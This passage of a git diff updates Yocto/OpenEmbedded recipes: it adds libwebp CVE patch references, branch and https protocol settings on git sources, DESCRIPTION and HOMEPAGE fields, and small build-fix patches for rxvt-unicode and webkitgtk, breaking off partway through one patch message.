@@ -19,6 +19,12 @@ SRC_URI[sha256sum] = "98a052268cc4d5ece27f76572a7f50293f439c17a98e67c4ea0c7ed6f5
19 19
20UPSTREAM_CHECK_URI = "http://downloads.webmproject.org/releases/webp/index.html" 20UPSTREAM_CHECK_URI = "http://downloads.webmproject.org/releases/webp/index.html"
21 21
22SRC_URI += " \
23 file://CVE-2023-1999.patch \
24 file://CVE-2023-4863-0001.patch \
25 file://CVE-2023-4863-0002.patch \
26"
27
22EXTRA_OECONF = " \ 28EXTRA_OECONF = " \
23 --disable-wic \ 29 --disable-wic \
24 --enable-libwebpmux \ 30 --enable-libwebpmux \
diff --git a/meta/recipes-multimedia/x264/x264_git.bb b/meta/recipes-multimedia/x264/x264_git.bb
index 39429a8809..6789646833 100644
--- a/meta/recipes-multimedia/x264/x264_git.bb
+++ b/meta/recipes-multimedia/x264/x264_git.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
8 8
9DEPENDS = "nasm-native" 9DEPENDS = "nasm-native"
10 10
11SRC_URI = "git://github.com/mirror/x264;branch=stable \ 11SRC_URI = "git://github.com/mirror/x264;branch=stable;protocol=https \
12 file://don-t-default-to-cortex-a9-with-neon.patch \ 12 file://don-t-default-to-cortex-a9-with-neon.patch \
13 file://Fix-X32-build-by-disabling-asm.patch \ 13 file://Fix-X32-build-by-disabling-asm.patch \
14 " 14 "
diff --git a/meta/recipes-rt/rt-tests/rt-tests.inc b/meta/recipes-rt/rt-tests/rt-tests.inc
index 3ac39d90c3..29ebe2d361 100644
--- a/meta/recipes-rt/rt-tests/rt-tests.inc
+++ b/meta/recipes-rt/rt-tests/rt-tests.inc
@@ -2,7 +2,7 @@
2SRCREV = "dff174f994f547a5785d32454865f140daacb0f5" 2SRCREV = "dff174f994f547a5785d32454865f140daacb0f5"
3PE = "1" 3PE = "1"
4 4
5SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git" 5SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main"
6# 1.2 to 1.5 seem to be development versions 6# 1.2 to 1.5 seem to be development versions
7UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))" 7UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))"
8 8
diff --git a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
index dad252b4ed..1db86b5067 100644
--- a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
+++ b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Real-Time preemption testcases" 1SUMMARY = "Real-Time preemption testcases"
2HOMEPAGE = "https://rt.wiki.kernel.org/index.php/Cyclictest" 2HOMEPAGE = "https://wiki.linuxfoundation.org/realtime/documentation/start"
3DESCRIPTION = "The main aim of the PREEMPT_RT patch is to minimize the amount of kernel code that is non-preemptible Therefore several substitution mechanisms and new mechanisms are implemented."
3SECTION = "tests" 4SECTION = "tests"
4DEPENDS = "linux-libc-headers virtual/libc" 5DEPENDS = "linux-libc-headers virtual/libc"
5LICENSE = "GPLv2 & GPLv2+" 6LICENSE = "GPLv2 & GPLv2+"
diff --git a/meta/recipes-sato/images/core-image-sato-dev.bb b/meta/recipes-sato/images/core-image-sato-dev.bb
index 7fa69d0997..f45a83273c 100644
--- a/meta/recipes-sato/images/core-image-sato-dev.bb
+++ b/meta/recipes-sato/images/core-image-sato-dev.bb
@@ -3,5 +3,6 @@ require core-image-sato.bb
3DESCRIPTION = "Image with Sato for development work. It includes everything \ 3DESCRIPTION = "Image with Sato for development work. It includes everything \
4within core-image-sato plus a native toolchain, application development and \ 4within core-image-sato plus a native toolchain, application development and \
5testing libraries, profiling and debug symbols." 5testing libraries, profiling and debug symbols."
6HOMEPAGE = "https://www.yoctoproject.org/"
6 7
7IMAGE_FEATURES += "dev-pkgs" 8IMAGE_FEATURES += "dev-pkgs"
diff --git a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
index 4f08d6eb64..d37ad00cf8 100644
--- a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
+++ b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
@@ -7,6 +7,7 @@ require conf/distro/include/ptest-packagelists.inc
7IMAGE_INSTALL += "${PTESTS_FAST}" 7IMAGE_INSTALL += "${PTESTS_FAST}"
8 8
9DESCRIPTION += "Also includes ptest packages with fast execution times to allow for more automated QA." 9DESCRIPTION += "Also includes ptest packages with fast execution times to allow for more automated QA."
10HOMEPAGE = "https://www.yoctoproject.org/"
10 11
11# This image is sufficiently large (~1.8GB) that it can't actually fit in a live 12# This image is sufficiently large (~1.8GB) that it can't actually fit in a live
12# image (which has a 4GB limit), so nullify the overhead factor (1.3x out of the 13# image (which has a 4GB limit), so nullify the overhead factor (1.3x out of the
diff --git a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
index 4d59c9536b..eea89a5d6c 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
@@ -5,6 +5,7 @@ require core-image-sato-sdk.bb
5require conf/distro/include/ptest-packagelists.inc 5require conf/distro/include/ptest-packagelists.inc
6 6
7DESCRIPTION += "Also includes ptest packages." 7DESCRIPTION += "Also includes ptest packages."
8HOMEPAGE = "https://www.yoctoproject.org/"
8 9
9PROVIDES += "core-image-sato-ptest" 10PROVIDES += "core-image-sato-ptest"
10 11
diff --git a/meta/recipes-sato/images/core-image-sato-sdk.bb b/meta/recipes-sato/images/core-image-sato-sdk.bb
index d7cc52b52b..b52de0def0 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk.bb
@@ -3,6 +3,7 @@ require core-image-sato.bb
3DESCRIPTION = "Image with Sato support that includes everything within \ 3DESCRIPTION = "Image with Sato support that includes everything within \
4core-image-sato plus meta-toolchain, development headers and libraries to \ 4core-image-sato plus meta-toolchain, development headers and libraries to \
5form a standalone SDK." 5form a standalone SDK."
6HOMEPAGE = "https://www.yoctoproject.org/"
6 7
7IMAGE_FEATURES += "dev-pkgs tools-sdk \ 8IMAGE_FEATURES += "dev-pkgs tools-sdk \
8 tools-debug eclipse-debug tools-profile tools-testapps debug-tweaks ssh-server-openssh" 9 tools-debug eclipse-debug tools-profile tools-testapps debug-tweaks ssh-server-openssh"
diff --git a/meta/recipes-sato/images/core-image-sato.bb b/meta/recipes-sato/images/core-image-sato.bb
index 673106eb6d..300d8e0d43 100644
--- a/meta/recipes-sato/images/core-image-sato.bb
+++ b/meta/recipes-sato/images/core-image-sato.bb
@@ -1,6 +1,7 @@
1DESCRIPTION = "Image with Sato, a mobile environment and visual style for \ 1DESCRIPTION = "Image with Sato, a mobile environment and visual style for \
2mobile devices. The image supports X11 with a Sato theme, Pimlico \ 2mobile devices. The image supports X11 with a Sato theme, Pimlico \
3applications, and contains terminal, editor, and file manager." 3applications, and contains terminal, editor, and file manager."
4HOMEPAGE = "https://www.yoctoproject.org/"
4 5
5IMAGE_FEATURES += "splash package-management x11-base x11-sato ssh-server-dropbear hwcodecs" 6IMAGE_FEATURES += "splash package-management x11-base x11-sato ssh-server-dropbear hwcodecs"
6 7
@@ -12,4 +13,5 @@ TOOLCHAIN_HOST_TASK_append = " nativesdk-intltool nativesdk-glib-2.0"
12TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0" 13TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0"
13 14
14QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}' 15QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}'
16QB_MEM_qemuarmv5 = "-m 256"
15QB_MEM_qemumips = "-m 256" 17QB_MEM_qemumips = "-m 256"
diff --git a/meta/recipes-sato/l3afpad/l3afpad_git.bb b/meta/recipes-sato/l3afpad/l3afpad_git.bb
index 6fdcc3e392..4d5d299d47 100644
--- a/meta/recipes-sato/l3afpad/l3afpad_git.bb
+++ b/meta/recipes-sato/l3afpad/l3afpad_git.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Simple GTK+ Text Editor" 1SUMMARY = "Simple GTK+ Text Editor"
2DESCRIPTION = "L3afpad is a simple GTK+ text editor that emphasizes simplicity. As development \
3focuses on keeping weight down to a minimum, only the most essential features \
4are implemented in the editor. L3afpad is simple to use, is easily compiled, \
5requires few libraries, and starts up quickly."
2HOMEPAGE = "https://github.com/stevenhoneyman/l3afpad" 6HOMEPAGE = "https://github.com/stevenhoneyman/l3afpad"
3 7
4# Note that COPYING seems to mistakenly contain LGPLv2.1. 8# Note that COPYING seems to mistakenly contain LGPLv2.1.
@@ -12,7 +16,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
12DEPENDS = "gtk+3 intltool-native gettext-native" 16DEPENDS = "gtk+3 intltool-native gettext-native"
13 17
14PV = "0.8.18.1.11+git${SRCPV}" 18PV = "0.8.18.1.11+git${SRCPV}"
15SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git" 19SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git;branch=master;protocol=https"
16SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff" 20SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff"
17 21
18S = "${WORKDIR}/git" 22S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
index 547e851c15..5733a36b12 100644
--- a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
+++ b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
@@ -11,7 +11,7 @@ RDEPENDS_${PN} = "settings-daemon"
11 11
12# SRCREV tagged 0.2 12# SRCREV tagged 0.2
13SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa" 13SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa"
14SRC_URI = "git://git.yoctoproject.org/${BPN} \ 14SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
15 file://no-handed.patch" 15 file://no-handed.patch"
16UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" 16UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
17 17
diff --git a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
index 5c23e85202..2a2eb24f57 100644
--- a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
+++ b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Matchbox Window Manager Desktop" 1SUMMARY = "Matchbox Window Manager Desktop"
2DESCRIPTION = "A lightweight windows manager for embedded systems. It uses the desktop background to provide an application launcher and allows modules to be loaded for additional functionality."
2HOMEPAGE = "http://matchbox-project.org/" 3HOMEPAGE = "http://matchbox-project.org/"
3BUGTRACKER = "http://bugzilla.yoctoproject.org/" 4BUGTRACKER = "http://bugzilla.yoctoproject.org/"
4 5
@@ -12,7 +13,7 @@ SECTION = "x11/wm"
12 13
13# SRCREV tagged 2.2 14# SRCREV tagged 2.2
14SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777" 15SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777"
15SRC_URI = "git://git.yoctoproject.org/${BPN}-2 \ 16SRC_URI = "git://git.yoctoproject.org/${BPN}-2;branch=master \
16 file://vfolders/* \ 17 file://vfolders/* \
17 " 18 "
18 19
diff --git a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
index dfc7fbad57..49e37bd77c 100644
--- a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
+++ b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Matchbox virtual keyboard for X11" 1SUMMARY = "Matchbox virtual keyboard for X11"
2DESCRIPTION = "An on screen 'virtual' or 'software' keyboard."
2HOMEPAGE = "http://matchbox-project.org" 3HOMEPAGE = "http://matchbox-project.org"
3BUGTRACKER = "http://bugzilla.yoctoproject.org/" 4BUGTRACKER = "http://bugzilla.yoctoproject.org/"
4SECTION = "x11" 5SECTION = "x11"
diff --git a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
index 2e6f5b7085..54fe578cd3 100644
--- a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
+++ b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Simple GTK+ based panel for handheld devices" 1SUMMARY = "Simple GTK+ based panel for handheld devices"
2DESCRIPTION = "A flexible always present 'window bar' for holding application \
3launchers and small 'applet' style applications"
2HOMEPAGE = "http://matchbox-project.org" 4HOMEPAGE = "http://matchbox-project.org"
3BUGTRACKER = "http://bugzilla.yoctoproject.org/" 5BUGTRACKER = "http://bugzilla.yoctoproject.org/"
4 6
@@ -21,7 +23,7 @@ RPROVIDES_${PN} = "matchbox-panel"
21RREPLACES_${PN} = "matchbox-panel" 23RREPLACES_${PN} = "matchbox-panel"
22RCONFLICTS_${PN} = "matchbox-panel" 24RCONFLICTS_${PN} = "matchbox-panel"
23 25
24SRC_URI = "git://git.yoctoproject.org/${BPN} \ 26SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
25 file://0001-applets-systray-Allow-icons-to-be-smaller.patch \ 27 file://0001-applets-systray-Allow-icons-to-be-smaller.patch \
26 " 28 "
27 29
diff --git a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
index 9f00281dde..e2e81c2905 100644
--- a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
+++ b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
@@ -11,7 +11,7 @@ SECTION = "x11/utils"
11 11
12#SRCREV tagged 0.2 12#SRCREV tagged 0.2
13SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5" 13SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5"
14SRC_URI = "git://git.yoctoproject.org/${BPN}" 14SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
15UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" 15UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
16 16
17S = "${WORKDIR}/git" 17S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
index 7a043d3447..bc4024736f 100644
--- a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
+++ b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
@@ -2,7 +2,7 @@ require matchbox-theme-sato.inc
2 2
3# SRCREV tagged 0.2 3# SRCREV tagged 0.2
4SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78" 4SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78"
5SRC_URI = "git://git.yoctoproject.org/matchbox-sato" 5SRC_URI = "git://git.yoctoproject.org/matchbox-sato;branch=master"
6UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" 6UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
7 7
8S = "${WORKDIR}/git" 8S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
index ed3f1a69a1..25725e078d 100644
--- a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
+++ b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
@@ -3,6 +3,8 @@
3# 3#
4 4
5SUMMARY = "Sato desktop" 5SUMMARY = "Sato desktop"
6DESCRIPTION = "Packagegroups provide a convenient mechanism of bundling a collection of packages."
7HOMEPAGE = "https://www.yoctoproject.org/"
6PR = "r33" 8PR = "r33"
7 9
8PACKAGE_ARCH = "${MACHINE_ARCH}" 10PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
index 7885e0abae..153fbeb0b7 100644
--- a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
+++ b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Fast lightweight tabbed filemanager" 1SUMMARY = "Fast lightweight tabbed filemanager"
2DESCRIPTION = "A free file manager application and the standard file manager of LXDE."
2HOMEPAGE = "http://pcmanfm.sourceforge.net/" 3HOMEPAGE = "http://pcmanfm.sourceforge.net/"
3 4
4LICENSE = "GPLv2 & GPLv2+ & LGPLv2.1+" 5LICENSE = "GPLv2 & GPLv2+ & LGPLv2.1+"
diff --git a/meta/recipes-sato/puzzles/puzzles_git.bb b/meta/recipes-sato/puzzles/puzzles_git.bb
index 41b78d6fe1..3ee441998d 100644
--- a/meta/recipes-sato/puzzles/puzzles_git.bb
+++ b/meta/recipes-sato/puzzles/puzzles_git.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Simon Tatham's Portable Puzzle Collection" 1SUMMARY = "Simon Tatham's Portable Puzzle Collection"
2DESCRIPTION = "Collection of small computer programs which implement one-player puzzle games."
2HOMEPAGE = "http://www.chiark.greenend.org.uk/~sgtatham/puzzles/" 3HOMEPAGE = "http://www.chiark.greenend.org.uk/~sgtatham/puzzles/"
3LICENSE = "MIT" 4LICENSE = "MIT"
4LIC_FILES_CHKSUM = "file://LICENCE;md5=6099f4981f9461d7f411091e69a7f07a" 5LIC_FILES_CHKSUM = "file://LICENCE;md5=6099f4981f9461d7f411091e69a7f07a"
@@ -8,7 +9,7 @@ DEPENDS = "libxt"
8# The libxt requires x11 in DISTRO_FEATURES 9# The libxt requires x11 in DISTRO_FEATURES
9REQUIRED_DISTRO_FEATURES = "x11" 10REQUIRED_DISTRO_FEATURES = "x11"
10 11
11SRC_URI = "git://git.tartarus.org/simon/puzzles.git \ 12SRC_URI = "git://git.tartarus.org/simon/puzzles.git;branch=main \
12 file://fix-compiling-failure-with-option-g-O.patch \ 13 file://fix-compiling-failure-with-option-g-O.patch \
13 file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \ 14 file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \
14 file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \ 15 file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
index b568f04580..0e5bcbe480 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
@@ -5,6 +5,7 @@ terminal emulator rxvt, modified to store text in Unicode \
5(either UCS-2 or UCS-4) and to use locale-correct input and \ 5(either UCS-2 or UCS-4) and to use locale-correct input and \
6output. It also supports mixing multiple fonts at the \ 6output. It also supports mixing multiple fonts at the \
7same time, including Xft fonts." 7same time, including Xft fonts."
8HOMEPAGE = "https://rxvt.org/"
8DEPENDS = "virtual/libx11 libxt libxft gdk-pixbuf libxmu" 9DEPENDS = "virtual/libx11 libxt libxft gdk-pixbuf libxmu"
9 10
10SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \ 11SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
new file mode 100644
index 0000000000..f10dca09d6
--- /dev/null
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
@@ -0,0 +1,30 @@
1From 9a8f1d73e7b7e183768a8379ef32429a84f0e5c2 Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com>
3Date: Fri, 26 Feb 2021 18:11:56 -0800
4Subject: [PATCH] libev: remove deprecated throw specification
5
6removes the throw specifications that are deprecated since C++11:
7warning: dynamic exception specifications are deprecated in C++11 [-Wdeprecated]
8
9Upstream-Status: Pending
10Signed-off-by: Khem Raj <raj.khem@gmail.com>
11---
12 libev/ev++.h | 2 +-
13 1 file changed, 1 insertion(+), 1 deletion(-)
14
15diff --git a/libev/ev++.h b/libev/ev++.h
16index 4f0a36a..85ddf44 100644
17--- a/libev/ev++.h
18+++ b/libev/ev++.h
19@@ -376,7 +376,7 @@ namespace ev {
20
21 struct default_loop : loop_ref
22 {
23- default_loop (unsigned int flags = AUTO) throw (bad_loop)
24+ default_loop (unsigned int flags = AUTO)
25 #if EV_MULTIPLICITY
26 : loop_ref (ev_default_loop (flags))
27 #endif
28--
292.30.1
30
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
index bfa8a614df..283e8d7751 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
@@ -4,5 +4,7 @@ LICENSE = "GPLv3"
4LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \ 4LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
5 file://src/main.C;beginline=1;endline=31;md5=d3600d7ee1062667fcd1193fbe6485f6" 5 file://src/main.C;beginline=1;endline=31;md5=d3600d7ee1062667fcd1193fbe6485f6"
6 6
7SRC_URI[md5sum] = "93782dec27494eb079467dacf6e48185" 7SRC_URI += "file://0001-libev-remove-deprecated-throw-specification.patch"
8
8SRC_URI[sha256sum] = "e94628e9bcfa0adb1115d83649f898d6edb4baced44f5d5b769c2eeb8b95addd" 9SRC_URI[sha256sum] = "e94628e9bcfa0adb1115d83649f898d6edb4baced44f5d5b769c2eeb8b95addd"
10
diff --git a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
index 2b1f513f1c..7e7612253d 100644
--- a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
+++ b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
@@ -11,7 +11,7 @@ DEPENDS = "matchbox-panel-2 gtk+3"
11 11
12# SRCREV tagged 0.3 12# SRCREV tagged 0.3
13SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756" 13SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756"
14SRC_URI = "git://git.yoctoproject.org/screenshot" 14SRC_URI = "git://git.yoctoproject.org/screenshot;branch=master"
15UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" 15UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
16 16
17S = "${WORKDIR}/git" 17S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
index d01177f9b9..19c4a73dc3 100644
--- a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
+++ b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
@@ -9,7 +9,7 @@ SECTION = "x11"
9 9
10# SRCREV tagged 0.0.2 10# SRCREV tagged 0.0.2
11SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2" 11SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2"
12SRC_URI = "git://git.yoctoproject.org/xsettings-daemon \ 12SRC_URI = "git://git.yoctoproject.org/xsettings-daemon;branch=master \
13 file://addsoundkeys.patch \ 13 file://addsoundkeys.patch \
14 file://70settings-daemon.sh \ 14 file://70settings-daemon.sh \
15 " 15 "
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
new file mode 100644
index 0000000000..528dec8c8b
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
@@ -0,0 +1,31 @@
1From dcf9ae0dc0b4510eddbeeea09e11edfb123f95af Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com>
3Date: Sun, 2 May 2021 13:10:49 -0700
4Subject: [PATCH] MiniBrowser: Fix reproduciblity
5
6Do not emit references to source dir in generated sourcecode
7
8Upstream-Status: Submitted [https://bugs.webkit.org/show_bug.cgi?id=225283]
9Signed-off-by: Khem Raj <raj.khem@gmail.com>
10---
11 Tools/MiniBrowser/gtk/CMakeLists.txt | 4 ++--
12 1 file changed, 2 insertions(+), 2 deletions(-)
13
14diff --git a/Tools/MiniBrowser/gtk/CMakeLists.txt b/Tools/MiniBrowser/gtk/CMakeLists.txt
15index 93b62521..482d3b00 100644
16--- a/Tools/MiniBrowser/gtk/CMakeLists.txt
17+++ b/Tools/MiniBrowser/gtk/CMakeLists.txt
18@@ -48,8 +48,8 @@ add_custom_command(
19 OUTPUT ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
20 ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
21 MAIN_DEPENDENCY ${MINIBROWSER_DIR}/browser-marshal.list
22- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
23- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
24+ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
25+ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
26 VERBATIM)
27
28 if (DEVELOPER_MODE)
29--
302.31.1
31
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
new file mode 100644
index 0000000000..d8bb8efb88
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
@@ -0,0 +1,66 @@
1From cb929f59b527fe890376e47613dfe1434a320bc0 Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com>
3Date: Tue, 11 Aug 2020 15:44:48 -0700
4Subject: [PATCH] [clang 11] fix build errors due to -WWc++11-narrowing
5
6https://bugs.webkit.org/show_bug.cgi?id=211193
7
8Reviewed by Adrian Perez de Castro.
9
10Fixes the following errors,
11
12Source/WebCore/html/MediaElementSession.cpp:1059:9: error: type 'WebCore::RenderMedia *' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
13m_element.renderer(),
14^~~~~~~~~~~~~~~~~~~~
15
16Source/WebCore/style/StyleResolver.cpp:106:55: error: type 'const char [4]' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
17m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
18 ^~~~~
19Source/WebCore/style/StyleResolver.cpp:106:55: note: insert an explicit cast to silence this issue
20m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
21 ^~~~~
22 static_cast<bool>( )
23
24* html/HTMLMediaElement.h:
25(WebCore::HTMLMediaElement::hasRenderer const):
26MediaElementSession was implicitly casting a pointer to a bool,
27which is not allowed with modern Clang checks. Add a helper method
28to encapsulate the now required static_cast<bool>.
29* html/MediaElementSession.cpp: Use the new helper method to see
30if the HTMLMediaElement has an associated renderer.
31(WebCore::MediaElementSession::updateMediaUsageIfChanged):
32* style/StyleResolver.cpp: This was calling MediaQueryEvaluator {
33"all" }; and seemingly expecting to cast a const char[] to a bool,
34or maybe String? It's confusing because of the MediaQueryEvaluator
35API. If it was implicitly converting to bool then that could be
